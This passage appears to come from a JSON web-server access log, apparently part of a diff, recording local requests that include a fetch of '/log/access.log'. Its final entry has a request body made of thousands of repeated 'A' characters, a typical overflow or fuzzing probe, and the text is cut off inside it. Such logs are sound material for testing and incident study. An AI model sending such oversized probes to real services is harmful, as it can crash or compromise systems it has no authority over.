Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA